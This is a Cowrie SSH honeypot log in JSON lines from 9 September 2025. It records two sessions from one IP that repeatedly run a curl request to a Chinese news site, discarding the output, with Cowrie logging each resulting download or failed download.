{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.918232Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.919477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.922246Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.923399Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.960848Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.962517Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:43.967465Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:43.969163Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.020115Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.021801Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.024892Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.025975Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.034860Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.060127Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.061190Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.065353Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.066077Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.088595Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.097460Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.098934Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.105750Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.107991Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.109495Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.124918Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.148985Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.150524Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.160093Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.171437Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.183494Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.185040Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.205391Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.206865Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.225254Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.226626Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.243238Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.244839Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.267908Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.269209Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.277598Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.280453Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.281336Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.292736Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.309860Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.310997Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.311930Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.317498Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.318804Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.339378Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.353607Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.355162Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.359593Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.361376Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.408959Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.410284Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.413308Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.414218Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.474034Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.475740Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.482371Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.483612Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.592686Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.594198Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.597049Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.599305Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.601549Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.602694Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.613317Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.652878Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.654738Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.655939Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.659775Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.660908Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.665244Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.667044Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.668298Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.705070Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.706733Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.707742Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.710767Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.711693Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.735233Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.742419Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.743624Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.751006Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.751872Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.784171Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.785036Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.786889Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.788631Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.794095Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.795158Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.808109Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.826329Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.827693Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.831489Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.835425Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.837625Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.838886Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.869891Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.873755Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.875079Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:44.880417Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.881553Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:44.899448Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
